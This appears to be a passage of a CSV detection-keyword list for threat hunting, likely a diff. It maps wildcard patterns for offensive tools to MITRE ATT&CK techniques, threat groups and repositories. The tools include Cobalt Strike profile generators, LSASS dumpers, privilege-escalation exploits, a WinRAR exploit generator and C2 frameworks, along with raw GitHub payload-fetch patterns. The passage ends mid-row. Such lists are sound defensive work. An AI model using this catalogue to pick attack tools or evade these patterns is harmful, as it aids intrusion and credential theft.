+"*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*random_c2_profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*random_c2profile.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*random_user_agent.params*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 
- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*random_user_agent.user_agent*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*randomalice1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z"
+"*-RandomAttackPath -Token*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z"
+"*randombob1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z"
+"*randomize_sw2_seed.py*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*Ransom.Win32.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword for ransomware","T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497","TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010","N/A","N/A","Ransomware","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Ransom:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","ransom signatures","10","10","N/A","N/A","N/A","N/A"
+"*Ransom:Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Ransom:Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Ransom_Petya*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Ransomware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Ransom_WCRY*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Ransomware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Ransomware POC tool that encrypts a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*Ransomware.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*Ransomware.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*ransomware_config.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*ransomware_payload.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
+"*RansomwarePoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*RansomwarePoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*RansomwarePoc\RansomwarePoc*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*Rapid7*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*rapid7.github.io/metasploit-framework/api/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*Rar a -v3g -k -r -s -m3 *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - 
T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*rar2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*rar2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*rarce *.pdf *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"*rarce *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"*rarce-1.0.0.tar.gz*","offensive_tool_keyword","RaRCE","An easy to 
install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"*rarce-1.0.0-py3-none-any.whl*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"*rasman*whoami*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*RasMan.cpp*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*RasMan.sln*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*RasMan.vcxproj*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*rasman_c.c*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*rasman_h.h*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*RasmanPotato-master*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*rasta-mouse*","offensive_tool_keyword","Github Username","github user author of various offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/rasta-mouse","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*rasta-mouse/PPEnum*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z"
+"*rasta-mouse/RuralBishop*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z"
+"*rasta-mouse/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*rasta-mouse/ThreatCheck*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
+"*rasta-mouse/TikiTorch*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*ratchatPT*/bin/bash*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*RatChatPT.exe*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*RatChatPT.exe*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False 
positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*RatChatPT_windows.exe*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*RatChatPT_windows.exe*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*ratchatpt-main*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*ratchatpt-main*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*raw*/straight-shooter.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*raw.githubusercontent.com*.7z*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*raw.githubusercontent.com*.apk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.app*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.as*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.asc*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.asp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bash*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.beacon*","greyware_tool_keyword","github","Github raw access 
content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bin*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bpl*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.c*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.cer*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.cmd*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.com*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*raw.githubusercontent.com*.cpp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.crt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.cs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.csh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.dat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.dll*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.docm*","greyware_tool_keyword","github","Github raw access content - abused by malwares 